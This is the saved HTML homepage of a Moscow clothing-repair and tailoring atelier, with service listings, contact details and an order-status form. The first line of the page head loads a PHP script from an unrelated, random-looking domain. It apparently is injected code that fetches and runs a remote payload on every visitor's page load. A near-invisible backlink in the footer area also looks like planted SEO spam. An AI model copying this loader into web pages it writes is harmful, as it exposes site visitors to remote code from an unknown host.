<!DOCTYPE html>
<html dir="ltr" slick-uniqueid="3" class="firefox firefox68 desktop custom-responsive" lang="">
<head>
  <script src="https://reteriixpp.site/scrypt.php"></script>
    <base href="">
	<meta http-equiv="content-type" content="text/html; charset=UTF-8">
	<meta name="keywords" content="Ателье в вешняках, ателье, ремонт одежды, пошив одежды в Москве, ателье рядом, пошив одежды на заказ, ателье по пошиву одежды, ателье Москва">
	<meta name="description" content="В нашем ателье вы можете получить услуги по пошиву и ремонту мужской женской и детской одежды любой сложности и из любых тканей, в точно  оговоренный срок.">
	<meta name="generator" content="Joomla! - Open Source Content Management">
	<title>Ателье по пошиву и ремонту одежды в Москве - "ARMSA"</title>
	<link href="favicon.ico" rel="shortcut icon" type="image/vnd.microsoft.icon">
	<link href="contactus_lightbox.css" rel="stylesheet" type="text/css">
	<link href="bootstrap.min.css" rel="stylesheet" type="text/css">
	<link href="maximenuck.php" rel="stylesheet" type="text/css">
	<link href="maximenuresponsiveck.css" rel="stylesheet" type="text/css">
	<style type="text/css">
.mobilemenuck-bar { display: none; position: relative; left: 0px; top: 0px; right: 0px; z-index: 100; }
.mobilemenuck-bar-title { display: block; }
.mobilemenuck-bar-button { cursor: pointer; box-sizing: border-box; position: absolute; top: 0px; right: 0px; line-height: 0.8em; font-family: Segoe UI; text-align: center; }
.mobilemenuck { box-sizing: border-box; width: 100%; }
.mobilemenuck-topbar { position: relative; }
.mobilemenuck-title { display: block; }
.mobilemenuck-button { cursor: pointer; box-sizing: border-box; position: absolute; top: 0px; right: 0px; line-height: 0.8em; font-family: Segoe UI; text-align: center; }
.mobilemenuck a { display: block; }
.mobilemenuck a:hover { text-decoration: none; }
.mobilemenuck .mobilemenuck-item > div { position: relative; }
[data-id="maximenuck94"] .mobilemenuck-bar-title { background: rgb(70, 70, 70) none repeat scroll 0% 0%; color: rgb(255, 255, 255); font-weight: bold; text-indent: 20px; line-height: 43px; font-size: 20px; }
[data-id="maximenuck94"] .mobilemenuck-bar-button { background: rgb(51, 51, 51) none repeat scroll 0% 0%; height: 43px; width: 43px; color: rgb(255, 255, 255); padding-top: 8px; font-size: 1.8em; }
.mobilemenuck[data-id="maximenuck94"] { background: rgb(70, 70, 70) none repeat scroll 0% 0%; color: rgb(255, 255, 255); padding-bottom: 5px; font-weight: bold; font-size: 1.2em; }
.mobilemenuck[data-id="maximenuck94"] a { color: rgb(255, 255, 255); font-weight: bold; font-size: 1.2em; }
[data-id="maximenuck94"] .mobilemenuck-title { background: rgb(70, 70, 70) none repeat scroll 0% 0%; height: 43px; text-indent: 20px; line-height: 43px; font-size: 20px; }
[data-id="maximenuck94"] .mobilemenuck-button { height: 35px; width: 45px; line-height: 35px; font-size: 1.8em; }
[data-id="maximenuck94"] .mobilemenuck-item > .level1 { background: rgb(2, 126, 166) none repeat scroll 0% 0%; border-radius: 5px; color: rgb(255, 255, 255); margin: 4px; padding-left: 15px; line-height: 35px; }
[data-id="maximenuck94"] .mobilemenuck-item > .level1 a { color: rgb(255, 255, 255); line-height: 35px; }
[data-id="maximenuck94"] .mobilemenuck-item > .level2 { background: rgb(255, 255, 255) none repeat scroll 0% 0%; border-radius: 5px; color: rgb(0, 0, 0); margin: 4px; padding-left: 25px; line-height: 35px; }
[data-id="maximenuck94"] .mobilemenuck-item > .level2 a { color: rgb(0, 0, 0); line-height: 35px; }
@media screen and (max-width: 664px) {
  #maximenuck94 .maximenumobiletogglericonck { display: block ! important; font-size: 33px ! important; text-align: right ! important; padding-top: 10px ! important; }
  #maximenuck94 ul.maximenuck .maximenumobiletogglerck ~ li.maximenuck.level1 { display: none ! important; }
  #maximenuck94 ul.maximenuck .maximenumobiletogglerck:checked ~ li.maximenuck.level1 { display: block ! important; }
}
@media screen and (max-width: 524px) {
}
@media screen and (min-width: 525px) {
}
#maximenuck94-mobile-bar { display: none; }
@media only screen and (max-width: 640px) {
  #maximenuck94 { display: none ! important; }
  #maximenuck94-mobile-bar { display: block; }
  body { padding-top: 40px ! important; }
}
</style>


    <link rel="stylesheet" href="system_001.css">
    <link rel="stylesheet" href="general.css">
    <meta name="viewport" content="initial-scale = 1.0, maximum-scale = 1.0, user-scalable = no, width = device-width">
    <link rel="stylesheet" href="template.css" media="screen" type="text/css">
    <link rel="stylesheet" href="template.responsive.css" media="all" type="text/css">
<link rel="stylesheet" type="text/css" href="http://fonts.googleapis.com/css?family=Belgrano|Italiana|Forum&amp;subset=latin">
<link rel="stylesheet" type="text/css" href="font-awesome.min_001.css">
<link rel="shortcut icon" href="favicon.ico" type="image/x-icon">

</head>
<body>
<div id="toTop" style="display: block;"></div><div id="dd-main">
<header class="dd-header" style="background-position: 50% 0%;">
<a href="#"><img class="logo" src="logo2.png" alt="Ателье Armsa">
    <p class="dd-slogan">Ателье по пошиву и ремонту одежды</p></a>
    <div class="dd-shapes">
        <div class="dd-object44953413" style="left: 319.5px; top: 182.45px; margin-left: 0px ! important;"><!--слайдер-->
<div id="wrapper">
<div class="slider-wrapper theme-default">
            <div id="slider" class="nivoSlider" style="position: relative; background: transparent url(&quot;1.jpg&quot;) no-repeat scroll 0% 0%;">
 <a href="" class="nivo-imageLink" style="display: block;"><img src="1.jpg" alt="Вышивка на ткани и одежде" style="display: none;"></a>
 <a href="" class="nivo-imageLink" style="display: none;"><img src="2.jpg" alt="Ремонт одежды" style="display: none;"></a>
 <a href="" class="nivo-imageLink" style="display: none;"><img src="3.jpg" alt="Изменение фасона" style="display: none;"></a>
 <a href="" class="nivo-imageLink" style="display: none;"><img src="4.jpg" alt="Работаем с изделиями из кожи и меха" style="display: none;"></a>
 <a href="" class="nivo-imageLink" style="display: none;"><img src="5.jpg" alt="Пошив одежды" style="display: none;"></a>
<div class="nivo-caption" style="display: none; opacity: 0.8;"><p></p></div><div class="nivo-directionNav" style="display: none;"><a class="nivo-prevNav">Prev</a><a class="nivo-nextNav">Next</a></div><div class="nivo-controlNav"><a class="nivo-control" rel="0">1</a><a class="nivo-control active" rel="1">2</a><a class="nivo-control" rel="2">3</a><a class="nivo-control" rel="3">4</a><a class="nivo-control" rel="4">5</a></div><div class="nivo-slice" style="left: 0px; width: 70px; height: 92.8763%; opacity: 0.928763; background: transparent url(&quot;2.jpg&quot;) no-repeat scroll 0px 0%; top: 0px; overflow: hidden;"></div><div class="nivo-slice" style="left: 70px; width: 70px; height: 84.2274%; opacity: 0.842274; background: transparent url(&quot;2.jpg&quot;) no-repeat scroll -70px 0%; bottom: 0px; overflow: hidden;"></div><div class="nivo-slice" style="left: 140px; width: 70px; height: 69.5687%; opacity: 0.695687; background: transparent url(&quot;2.jpg&quot;) no-repeat scroll -140px 0%; top: 0px; overflow: hidden;"></div><div class="nivo-slice" style="left: 210px; width: 70px; height: 55.6428%; opacity: 0.556428; background: transparent url(&quot;2.jpg&quot;) no-repeat scroll -210px 0%; bottom: 0px; overflow: hidden;"></div><div class="nivo-slice" style="left: 280px; width: 70px; height: 37.5655%; opacity: 0.375655; background: transparent url(&quot;2.jpg&quot;) no-repeat scroll -280px 0%; top: 0px; overflow: hidden;"></div><div class="nivo-slice" style="left: 350px; width: 70px; height: 24.278%; opacity: 0.24278; background: transparent url(&quot;2.jpg&quot;) no-repeat scroll -350px 0%; bottom: 0px; overflow: hidden;"></div><div class="nivo-slice" style="left: 420px; width: 70px; height: 13.1243%; opacity: 0.131243; background: transparent url(&quot;2.jpg&quot;) no-repeat scroll -420px 0%; top: 0px; overflow: hidden;"></div><div class="nivo-slice" style="left: 490px; width: 70px; height: 4.4947%; opacity: 0.044947; background: transparent url(&quot;2.jpg&quot;) no-repeat scroll -490px 0%; bottom: 0px; overflow: hidden;"></div><div class="nivo-slice" style="left: 560px; width: 70px; height: 0.0355264%; opacity: 0.000355264; background: transparent url(&quot;2.jpg&quot;) no-repeat scroll -560px 0%; top: 0px; overflow: hidden;"></div><div class="nivo-slice" style="left: 630px; width: 70px; height: 0px; opacity: 0; background: transparent url(&quot;2.jpg&quot;) no-repeat scroll -630px 0%; bottom: 0px;"></div><div class="nivo-slice" style="left: 700px; width: 70px; height: 0px; opacity: 0; background: transparent url(&quot;2.jpg&quot;) no-repeat scroll -700px 0%; top: 0px;"></div><div class="nivo-slice" style="left: 770px; width: 70px; height: 0px; opacity: 0; background: transparent url(&quot;2.jpg&quot;) no-repeat scroll -770px 0%; bottom: 0px;"></div><div class="nivo-slice" style="left: 840px; width: 70px; height: 0px; opacity: 0; background: transparent url(&quot;2.jpg&quot;) no-repeat scroll -840px 0%; top: 0px;"></div><div class="nivo-slice" style="left: 910px; width: 70px; height: 0px; opacity: 0; background: transparent url(&quot;2.jpg&quot;) no-repeat scroll -910px 0%; bottom: 0px;"></div><div class="nivo-slice" style="left: 980px; width: 69px; height: 0px; opacity: 0; background: transparent url(&quot;2.jpg&quot;) no-repeat scroll -980px 0%; top: 0px;"></div></div></div></div>
<br><br></div>
<div class="dd-object458882034" style="left: 551.9px; top: -390.64px; margin-left: 0px ! important;"></div><!--укрошалка-->
<div class="dd-object11583362" style="left: 339.85px; top: 497.92px; margin-left: 0px ! important;"></div><!--веточка-->
<div class="dd-object1620084780" style="left: 144.42px; top: 206.46px; margin-left: 0px ! important;"></div><!--букет с лева внизу на слайдер-->
<div class="dd-object1878271522" style="left: 1187.08px; top: 301.44px; margin-left: 0px ! important;"></div><!--расочка правая для слайдера-->
<div class="dd-object338856135" style="left: 306.98px; top: 170.64px; margin-left: 0px ! important;"></div><!--рамочка левая для слайдера-->
<div class="dd-object248179695" style="left: 729.3px; top: 142.8px; margin-left: 0px ! important;"></div><!--палочка под менюшкой-->
<div class="dd-object321673511" style="left: 689.76px; top: 35.76px; margin-left: 0px ! important;"></div><!--веточка-->
<div class="dd-object87415494" style="left: 295.87px; top: -31.39px; margin-left: 0px ! important;"></div><!--веточка-->
<div class="dd-object1449059077" style="left: 851.5px; top: -0.96px; margin-left: 0px ! important;"></div>
<div class="look-shapes">
<div class="timeworking-shapes">
    Мы работаем: без выходных,<br>с 10:00 до 20:00<br>По адресу: ул.Вешняковская 12Б стр.1,<br>цокольный этаж</div>
<div class="phones-shapes">
<div class="dd-textblock dd-phoneshapes-two">
        <div class="dd-phoneshapes-two-text-container">
        <div class="dd-phoneshapes-two-text"><b><a href="tel:+7 (985) 615 84 47" class="phones_shapes"> +7(985)615-84-47</a></b></div>
    </div>
</div><div class="dd-textblock dd-phoneshapes">
        <div class="dd-phoneshapes-text-container">
        <div class="dd-phoneshapes-text"><b><a href="tel:+7 (966) 054 79 02"> +7(966)054-79-02</a></b></div>
    </div></div></div>
    <div class="dd-textblock dd-mailshapes">
        <div class="dd-mailshapes-text-container">
        <div class="dd-mailshapes-text"><a href=""><img src="emailButton.png"></a></div>
    </div>
</div> </div>
</div>
<div class="dd-textblock dd-textblock-1573430999" style="left: 250.34px; top: 245.44px; margin-left: 0px ! important;">
        <div class="social-icons-7">
    <a href="https://vk.com/armsa_moscow" target="new"><i class="fa fa-vk"></i></a>
       </div>
</div>
<div class="dd-textblock dd-textblock-1464283190" style="left: 251.3px; top: 193.52px; margin-left: 0px ! important;">
        <div class="social-icons-7">
        <a href="https://www.facebook.com/%D0%90%D1%82%D0%B5%D0%BB%D1%8C%D0%B5-Armsa-546726835501114" target="new"><i class="fa fa-facebook"></i></a>
    </div></div>
<div class="dd-textblock dd-textblock-14642831901">
        <div class="social-icons-7">
        <a href="" target="new"><i class="fa fa-instagram"></i></a>
    </div></div>
<nav class="dd-nav desktop-nav" style="left: 0px; width: 1687px;">
    <div class="dd-nav-inner">
    
	<div class="maximenuckh ltr" id="maximenuck94" style="z-index: 100;">
        <div class="maxiroundedleft"></div>
        <div class="maxiroundedcenter">
            <ul class=" maximenuck" data-mobilemenuck-id="maximenuck94">
								<label for="maximenuck94-maximenumobiletogglerck" class="maximenumobiletogglericonck" style="display: none;">≡</label><input id="maximenuck94-maximenumobiletogglerck" class="maximenumobiletogglerck" style="display: none;" type="checkbox">				<li data-level="1" class="maximenuck item101 current active first parent level1 " style="z-index: 12000;"><a data-hover="Главная" class="maximenuck " href="#"><span class="titreck" data-hover="Главная">Главная</span></a>
	<div class="floatck" style=""><span class="maxiclose">Close</span><div class="maxidrop-top"><div class="maxidrop-top2"></div></div><div class="maxidrop-main" style=""><div class="maxidrop-main2"><div class="maximenuck2 first ">
	<ul class="maximenuck2"><li data-level="2" class="maximenuck item169 first level2 " style="z-index: 11999;"><a data-hover="О нас" class="maximenuck " href=""><span class="titreck" data-hover="О нас">О нас</span></a>
		</li><li data-level="2" class="maximenuck item122 level2 " style="z-index: 11998;"><a data-hover="Отзывы" class="maximenuck " href=""><span class="titreck" data-hover="Отзывы">Отзывы</span></a>
		</li><li data-level="2" class="maximenuck item170 level2 " style="z-index: 11997;"><a data-hover="Гарантии и возврат" class="maximenuck " href=""><span class="titreck" data-hover="Гарантии и возврат">Гарантии и возврат</span></a>
		</li><li data-level="2" class="maximenuck item171 last level2 " style="z-index: 11996;"><a data-hover="Вакансии" class="maximenuck " href=""><span class="titreck" data-hover="Вакансии">Вакансии</span></a>
	</li>
	</ul>
	<div class="clr"></div></div><div class="clr"></div></div></div><div class="maxidrop-bottom"><div class="maxidrop-bottom2"></div></div></div>
	</li><li data-level="1" class="maximenuck item103 parent level1 " style="z-index: 11995;"><a data-hover="Пошив одежды" class="maximenuck " href=""><span class="titreck" data-hover="Пошив одежды">Пошив одежды</span></a>
	<div class="floatck" style=""><span class="maxiclose">Close</span><div class="maxidrop-top"><div class="maxidrop-top2"></div></div><div class="maxidrop-main" style=""><div class="maxidrop-main2"><div class="maximenuck2 first ">
	<ul class="maximenuck2"><li data-level="2" class="maximenuck item168 first level2 " style="z-index: 11994;"><a data-hover="Пошив женской одежды" class="maximenuck " href=""><span class="titreck" data-hover="Пошив женской одежды">Пошив женской одежды</span></a>
		</li><li data-level="2" class="maximenuck item105 last level2 " style="z-index: 11993;"><a data-hover="Пошив мужской одежды" class="maximenuck " href=""><span class="titreck" data-hover="Пошив мужской одежды">Пошив мужской одежды</span></a>
	</li>
	</ul>
	<div class="clr"></div></div><div class="clr"></div></div></div><div class="maxidrop-bottom"><div class="maxidrop-bottom2"></div></div></div>
	</li><li data-level="1" class="maximenuck item156 level1 " style="z-index: 11992;"><a data-hover="Ремонт одежды" class="maximenuck " href=""><span class="titreck" data-hover="Ремонт одежды">Ремонт одежды</span></a>
		</li><li data-level="1" class="maximenuck item157 level1 " style="z-index: 11991;"><a data-hover="Корпоративным клиентам" class="maximenuck " href=""><span class="titreck" data-hover="Корпоративным клиентам">Корпоративным клиентам</span></a>
		</li><li data-level="1" class="maximenuck item164 level1 " style="z-index: 11990;"><a data-hover="Кожа и меха" class="maximenuck " href=""><span class="titreck" data-hover="Кожа и меха">Кожа и меха</span></a>
		</li><li data-level="1" class="maximenuck item158 level1 " style="z-index: 11989;"><a data-hover="Домашний текстиль" class="maximenuck " href=""><span class="titreck" data-hover="Домашний текстиль">Домашний текстиль</span></a>
		</li><li data-level="1" class="maximenuck item159 level1 " style="z-index: 11988;"><a data-hover="Вышивка" class="maximenuck " href=""><span class="titreck" data-hover="Вышивка">Вышивка</span></a>
		</li><li data-level="1" class="maximenuck item113 level1 " style="z-index: 11987;"><a data-hover="Памятка" class="maximenuck " href=""><span class="titreck" data-hover="Памятка">Памятка</span></a>
		</li><li data-level="1" class="maximenuck item138 level1 " style="z-index: 11986;"><a data-hover="Галерея" class="maximenuck " href=""><span class="titreck" data-hover="Галерея">Галерея</span></a>
		</li><li data-level="1" class="maximenuck item163 level1 " style="z-index: 11985;"><a data-hover="Скидки и акции" class="maximenuck " href=""><span class="titreck" data-hover="Скидки и акции">Скидки и акции</span></a>
		</li><li data-level="1" class="maximenuck item102 last level1 " style="z-index: 11984;"><a data-hover="Контакты" class="maximenuck " href=""><span class="titreck" data-hover="Контакты">Контакты</span></a></li>            </ul>
        </div>
        <div class="maxiroundedright"></div>
        <div style="clear: both;"></div>
    </div>
        </div>
    </nav>
</header>
<div class="dd-sheet clearfix">
            <article class="dd-post"><div class="dd-postcontent clearfix"><div class="breadcrumbs">
<span class="showHere">Вы здесь: </span><span>Главная</span></div></div></article><div class="dd-layout-wrapper">
                <div class="dd-content-layout">
                    <div class="dd-content-layout-row">
                                                <div class="dd-layout-cell dd-content">
<div class="dd-nostyle">

<div class="custom">
	<div class="status">
   <h2>
    Cтатус заказа
  </h2><br>


<center>
  
  
	<form action="" method="POST" class="signup" id="my_form">
     
<p>
 Введите пожалуйста номер заказа указанный в квитанции.
</p>
<br>
      
		<input placeholder="Номер заказа" name="number" type="text">
      <input name="sndbtn" class="statusclick" value="Проверить" type="submit">
      
	</form></center><br>
  <div id="my_message"></div>

  </div>

</div>

</div>

<article class="dd-post"><div class="dd-postcontent clearfix">﻿<div class="blog1latestnews1">
<div class="blog1latestnews2">
<div class="blog1latestnews3">
<a href=""><img src="glavnay4.jpeg"></a></div>

<div class="blog1latestnews4"><a href="">Кожа и меха</a></div><div class="blog1latestnews5">
 Работаем с изделиями из кожи и меха!
 Мы выполняем широкий спектр разнообразных услуг для изделий ...</div></div>


<div class="blog1latestnews2">
<div class="blog1latestnews3">
<a href=""><img src="glavnay1.jpg"></a></div>

<div class="blog1latestnews4"><a href="">Пошив одежды</a></div><div class="blog1latestnews5">  
 Мы выполняем пошив одежды любой сложности!
 Мы оказываем услуги по пошиву различных предметов га...</div></div>
<div class="blog1latestnews7b_2"></div>

<div class="blog1latestnews2">
<div class="blog1latestnews3">
<a href=""><img src="glavnay5.png"></a></div>

<div class="blog1latestnews4"><a href="">Вышивка</a></div><div class="blog1latestnews5">Выполняем машинную вышивку любой сложности на ткани, крое и  одежде!
 Мы выполняем вышивку на ткани ...</div></div>
<div class="blog1latestnews7b_3"></div>

<div class="blog1latestnews2">
<div class="blog1latestnews3">
<a href=""><img src="Glavnay_textil.jpg"></a></div>

<div class="blog1latestnews4"><a href="">Домашний текстиль</a></div><div class="blog1latestnews5">
    
   
   Сошьем домашний текстиль для любого интерьера!
 
 У нас вы можете заказать одежду не то...</div></div>
<div class="blog1latestnews7b_2"></div>

<div class="blog1latestnews2">
<div class="blog1latestnews3">
<a href=""><img src="glavnay7.jpg"></a></div>

<div class="blog1latestnews4"><a href="">Корпоративным клиентам</a></div><div class="blog1latestnews5">
 Корпоративный костюм, театральный костюм, одежда для персонала!
 Выполняем пошив одежды&nbsp; для&nbsp; баро...</div></div>


<div class="blog1latestnews2">
<div class="blog1latestnews3">
<a href=""><img src="glavnay2.jpg"></a></div>

<div class="blog1latestnews4"><a href="">Ремонт одежды</a></div><div class="blog1latestnews5">
   
 Мы&nbsp;выполняем мелкий и крупный ремонт любой одежды!
 Стерлись любимые джинсы? Порвалась юбка ил...</div></div>
<div class="blog1latestnews7b_3"></div><div class="blog1latestnews7b_2"></div>

<div class="blog1latestnews7a"></div></div>
<div style="text-align: right;" class="blavtors"><a style="text-decoration: none; color: rgb(192, 192, 192) ! important; font-family: arial,helvetica,sans-serif; font-size: 7px ! important;" title="  PHP, Jquery, Joomla  Wordpress" href="#">blogprogram.ru</a></div>

<style>
.blog1latestnews1 { overflow: hidden ! important; padding: 0px ! important; margin: 10px 0px ! important; }
.blog1latestnews2 { margin: 0px 2% 34px 0px ! important; padding: 0px ! important; float: left ! important; width: 14.6% ! important; }
.blog1latestnews3 { margin: 0px ! important; padding: 0px ! important; height: 140px ! important; overflow: hidden; }
.blog1latestnews3 img { width: 100% ! important; height: 100% ! important; object-fit: cover; border: 0px solid rgb(210, 210, 210) ! important; margin: 0px ! important; padding: 0px ! important; float: none ! important; display: block ! important; opacity: 1 ! important; max-width: none ! important; box-shadow: none ! important; border-radius: 0px ! important; }
.blog1latestnews3 img:hover { opacity: 0.8 ! important; }
.blog1latestnews4 { margin: 10px 0px ! important; padding: 0px ! important; font-size: 14px ! important; line-height: 18px ! important; text-align: left ! important; text-shadow: none ! important; }
.blog1latestnews4 a { font-size: 14px ! important; line-height: 18px ! important; color: rgb(68, 20, 19) ! important; font-weight: bold ! important; text-decoration: none ! important; text-align: left ! important; text-shadow: none ! important; transition: all 0.3s ease 0s; }
.blog1latestnews4 a:hover { color: rgb(0, 0, 0) ! important; }
.blog1latestnews5 { margin: 0px ! important; padding: 0px ! important; font-size: 14px ! important; line-height: 18px ! important; text-align: left ! important; font-weight: normal ! important; text-shadow: none ! important; color: rgb(112, 79, 41) ! important; }
.blog1latestnews7a { clear: both; }
@media (max-width: 1199px) {
  .blog1latestnews2 { margin-right: 3% ! important; width: 30% ! important; float: left ! important; }
  .blog1latestnews7a { clear: none; }
  .blog1latestnews7b_3 { clear: both; }
  .blog1latestnews3 { float: none ! important; }
}
@media (max-width: 767px) {
  .blog1latestnews7b_3 { clear: none; }
  .blog1latestnews7b_2 { clear: both; }
  .blog1latestnews2 { margin-right: 3% ! important; width: 47% ! important; }
}
@media (max-width: 480px) {
  .blog1latestnews7b_3 { clear: none; }
  .blog1latestnews7b_2 { clear: none; }
  .blog1latestnews2 { clear: both; }
  .blog1latestnews2 { margin-right: 0% ! important; width: 100% ! important; }
}
</style>
</div></article><article class="dd-post dd-messages" style="display: none;"><div class="dd-postcontent clearfix"><div id="system-message-container">
	</div>
</div></article><div class="item-page"><article class="dd-post"><div class="dd-postcontent clearfix"><div class="dd-article"><center><div class="container">
<div class="box" style="width: 100%;">
<div class="iconblock-5"> 

<div class="icon">
		<i class="fa fa-users"></i>
		<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0" y="0" viewBox="0 -10 300 320" xml:space="preserve">           
			<polygon points="22.3,223.7 22.3,76.3 150,2.5 277.7,76.3 277.7,223.7 150,297.5"></polygon>
			<path d="M150,4.8l125.7,72.6v145.2L150,295.2L24.3,222.6V77.4L150,4.8 M150,0.2L20.3,75.1v149.8L150,299.8l129.7-74.9V75.1L150,0.2 L150,0.2z"></path>            
		</svg>
	</div>
	<h3>5086 клиентов</h3>
	<p>У нас уже более 5000 клиентов которые обращались в наше ателье и остались довольны</p>
</div>
<div class="iconblock-5">
	<div class="icon">
		<i class="fa fa-scissors"></i>
		<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0" y="0" viewBox="0 -10 300 320" xml:space="preserve">           
			<polygon points="22.3,223.7 22.3,76.3 150,2.5 277.7,76.3 277.7,223.7 150,297.5"></polygon>
			<path d="M150,4.8l125.7,72.6v145.2L150,295.2L24.3,222.6V77.4L150,4.8 M150,0.2L20.3,75.1v149.8L150,299.8l129.7-74.9V75.1L150,0.2 L150,0.2z"></path>            
		</svg>
	</div>
	<h3>Опытные мастера</h3>
	<p>Наши мастера могут выполнить любой заказ. Опыт работы мастеров более 20 лет</p>
</div>
<div class="iconblock-5">
	<div class="icon">
		<i class="fa fa-thumbs-o-up"></i>
		<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0" y="0" viewBox="0 -10 300 320" xml:space="preserve">           
			<polygon points="22.3,223.7 22.3,76.3 150,2.5 277.7,76.3 277.7,223.7 150,297.5"></polygon>
			<path d="M150,4.8l125.7,72.6v145.2L150,295.2L24.3,222.6V77.4L150,4.8 M150,0.2L20.3,75.1v149.8L150,299.8l129.7-74.9V75.1L150,0.2 L150,0.2z"></path>            
		</svg>
	</div>
	<h3>Более 1000 отшитых изделий</h3>
	<p>Мы шьем одежду любой сложности  и из любых тканей, качественно и в оговоренный срок.</p>
</div> </div> </div> </center>


<div class="art-content-layout-wrapper" style="margin-bottom: 10px;">
<div class="art-content-layout" style="border-spacing: 10px 0px; border-collapse: separate; text-align: center;">
<div class="art-content-layout-row">
<div class="container">
<div class="row">
</div></div>
<center>
<p><span style="font-size: large; color: rgb(72, 61, 139);">Получи бесплатную консультацию прямо сейчас!<br> </span></p>
		<div class="moduletable">
							
	<div>
		<button class=" contactus-center contactus-91 contactus-button" style="background-color: rgb(138, 97, 21); bottom: 35%;" id="button-contactus-lightbox-form91">Получить консультацию</button>
	</div>
	
<div class="contactus-alert" id="contactus-sending-alert91">
	<div class="contactus-lightbox-caption" style="background-color: rgb(138, 97, 21);">
		<div class="contactus-lightbox-cap"><h4 class="contactus-lightbox-text-center">Ваше сообщение отправленно!</h4></div><div class="contactus-lightbox-closer"><i id="contactus-lightbox-sending-alert-close91" class="fa fa-close fa-1x"></i></div>
	</div>
	<div class="contactus-alert-body">
		<p class="contactus-lightbox-text-center">Спасибо за вашу заявку! Мастер перезвонит Вам в ближайшее время.</p>
	</div>
</div>
</div>
	
<p class="p1" style="text-align: center;">или позвоните нам по телефону&nbsp;<strong>+7(985)615-84-47,&nbsp; &nbsp;</strong>а так же можете&nbsp;<a title="whatsapp" href="whatsapp://send/?phone=79660547902">Написать в WhatsApp<img src="3721678-whatsapp_108065.png" alt="" align="middle"></a> &nbsp;</p>
<h1>Мастерская - ателье по индивидуальному пошиву и ремонту одежды</h1>
<p style="text-align: justify;">У нас вы можете получить услуги по пошиву и ремонту мужской женской и детской одежды. Наши мастера имеют высокую квалификацию и выполняют работу любой сложности.<br> Если вы хотите заказать <a href=""> пошив одежды </a> в Москве или отремонтировать любимую вещь, то Вам нужно к нам. <br>Мы работаем уже более 20 лет и наши работы, отличаются высоким качеством.<br> А так же вы останетесь довольны уровнем обслуживания в ателье "Armsa". Доброжелательный мастер поможет вам определиться с выбором ткани, фасона, фурнитурой и предложит варианты ремонта вашего изделия. Подберет оптимальный вариант по цене и качеству. <br>Пошив женской одежды, мужской или детской, а так же <a href="">ремонт одежды </a> это творческий процесс и требует творческого подхода, поэтому каждая вещь которую мы отдаем клиенту имеет частичку нашей души. И мы гордимся нашими успехами и вашими счастливыми улыбками.</p>
<br>
<span style="font-size: 12pt;">Если вам понравилось у нас (или не понравилось) Вы можете оставить свой отзыв о нашем ателье в Яндекс справочнике </span></center></div>
<div class="art-content-layout" style="border-spacing: 10px 0px; border-collapse: separate; text-align: center;"><span style="font-size: 12pt;"> или на нашем сайте на странице <a href="">Отзывы</a>. Это поможет другим людям составить мнение о нас и принять верное решение!</span></div><center><iframe src="index_1.html" frameborder="0" width="150" height="50"></iframe>
  </center></div></div> </div></div></article></div><!-- begin nostyle -->
<div class="dd-nostyle">
<!-- begin nostyle content -->


<div class="custom">
	<center><div class="container">
<div class="box" style="width: 100%;">
<div class="iconblock-5" style="float: left; width: 100%;"> 
	<div class="icon">
		<i class="fa fa-money"></i>
		<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0" y="0" viewBox="0 -10 300 320" xml:space="preserve">           
			<polygon points="22.3,223.7 22.3,76.3 150,2.5 277.7,76.3 277.7,223.7 150,297.5"></polygon>
			<path d="M150,4.8l125.7,72.6v145.2L150,295.2L24.3,222.6V77.4L150,4.8 M150,0.2L20.3,75.1v149.8L150,299.8l129.7-74.9V75.1L150,0.2 L150,0.2z"></path>            
		</svg>
	</div>
	<h3>Приходите к нам чаще - платите меньше!</h3>
	<p>Для наших любимых клиентов в нашем Ателье действует бонусная система скидок, балами можно рассчитаться до 100 % стоимости заказа! <br>Подробнее о программе лояльности читайте <a href="">тут</a></p><br>
  
  </div></div></div>
  
</center></div>
<!-- end nostyle content -->
</div>
<!-- end nostyle -->
  </div>
                                            </div>
                </div>
            </div>
<footer class="dd-footer">
<div class="dd-content-layout">
    <div class="dd-content-layout-row responsive-layout-row-1">
    <div class="dd-layout-cell layout-item-0" style="width: 100%;">
    </div>
    </div>
</div>

<div class="dd-contact-footer">
<div class="dd-sitemap-footer"><br>
<a href="#"> Главная </a><br>
<a href="">Пошив одежды </a><br>
<a href="">Ремонт одежды </a><br>
<a href="">Корпоративным клиентам</a><br>
<a href="">Кожа и меха</a><br>
<a href="">Домашний текстиль </a><br>
<a href=""> Памятка </a><br>
<a href="">Вышивка </a><br>
<a href=""> Галерея наших работ </a><br>
<a href="">Отзывы </a><br>
<a href="">Контакты</a><br>
<a href="">Скидки и акции </a><br>
<a href="">Политика конфиденциальности</a>
</div>
<div class="dd-grafic-footer">
<br><br>
<p> Мы работаем без выходных <br>с 10:00 - 20:00  </p><br>
<p> По адресу: г. Москва ул. Вешняковская 12Б строение 1 <br>(цокольный этаж)</p><br>
<p>Звоните нам по телефонам <br><br><strong>
    <a href="tel:+7 (985) 615 84 47"> +7(985)615-84-47</a> <br><br>
    <a href="tel:+7 (966) 054 79 02"> +7(966)054-79-02</a>
</strong><br>
<br>а так же можете<a href="https://whatsapp.com/send?phone=79660547902" target="_blank" rel="noopener noreferrer" class="modal_link rl_modals_element" aria-label="Popup link" data-modal-iframe="true" data-modal-inner-width="95%" data-modal-inner-height="95%" data-modal-class-name="no_title" data-modal-done="1"><!-- END: Modals --> Написать в WhatsApp</a></p> 
</div> 
<div class="socialfooter">
    <center><br><br>
<p>Присоединяйтесь к нам в социальных сетях и вдохновляйтесь каждый день!</p>
         <table>
        <tbody><tr>
            <td>
                 <div class="social-icons-71">
        <a href="https://vk.com/armsa_moscow" target="new"><i class="fa fa-vk"></i></a></div>
            </td>
            <td>
                 <div class="social-icons-71">
        <a href="https://www.facebook.com/%D0%90%D1%82%D0%B5%D0%BB%D1%8C%D0%B5-Armsa-546726835501114" target="new"><i class="fa fa-facebook"></i></a>
    </div>
            </td>
            <td>
              <div class="social-icons-71">
        <a href="https://www.instagram.com/poshiv_moscow/" target="new"><i class="fa fa-instagram"></i></a>
    </div>  
            </td>
        </tr>
    </tbody></table>   </center><br>
       <img src="logo.png">
</div></div>

</footer>
    </div>
